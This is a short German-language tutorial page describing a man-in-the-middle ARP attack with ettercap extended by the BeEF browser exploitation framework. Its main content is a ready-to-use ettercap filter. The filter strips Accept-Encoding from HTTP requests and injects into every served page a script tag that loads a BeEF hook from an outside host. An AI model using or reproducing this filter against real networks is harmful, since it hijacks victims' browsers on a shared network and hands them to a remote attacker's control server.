<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>beEF and ARP is fun!</title>
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Tutorial</u>
<b>[+]</b><u>Von: Perforin</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Tutorials</a></u>
</pre>
	<hr />
<pre>

Ich hab hier mal ein kleines Video gemacht, wo ich eine MITM Attacke starte
und diese mit dem beEF Framework noch erweitere. Alles was ihr dazu braucht
ist einmal beEF, ettercap und nat&uuml;rlich die passenden ettercap filter!

Den Filter stelle ich euch hier nochmal zur Verf&uuml;gung, dann m&uuml;sst ihr
den nicht mehr von Hand abtippen ;)

</pre>
	<hr />
<video src="Tutorials/beEF_and_arp_is_fun.ogg" controls="controls">
your browser does not support the video tag
</video>
	<hr />
<xmp>
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("<body", "<script language='Javascript' src="http://virii.lu/beef/hook/beefmagic.js.php"></script><body");
   msg("BeEF ARP Attack\n");
}
</xmp>
	
</body>
</html>
